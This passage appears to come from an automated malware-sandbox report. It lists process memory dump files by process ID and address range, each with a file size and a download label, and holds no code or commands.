memory/2552-394-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2672-391-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2672-377-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2772-491-0x0000000010000000-0x0000000010565000-memory.dmp

Filesize
5.4MB

Download
memory/2792-239-0x0000000073950000-0x000000007403E000-memory.dmp

Filesize
6.9MB

Download
memory/2792-347-0x00000000082A0000-0x0000000008788000-memory.dmp

Filesize
4.9MB

Download
memory/2792-14-0x0000000004610000-0x0000000004650000-memory.dmp

Filesize
256KB

Download
memory/2792-11-0x0000000073950000-0x000000007403E000-memory.dmp

Filesize
6.9MB

Download
memory/2792-10-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2792-231-0x00000000082A0000-0x0000000008788000-memory.dmp

Filesize
4.9MB

Download
memory/2792-8-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2792-253-0x0000000004610000-0x0000000004650000-memory.dmp

Filesize
256KB

Download
memory/2792-5-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2808-478-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2808-486-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2808-481-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2808-509-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2844-361-0x0000000002560000-0x0000000002958000-memory.dmp

Filesize
4.0MB

Download
memory/2844-360-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2844-345-0x0000000002560000-0x0000000002958000-memory.dmp

Filesize
4.0MB

Download
memory/2844-337-0x0000000002560000-0x0000000002958000-memory.dmp

Filesize
4.0MB

Download
memory/2968-479-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2968-475-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download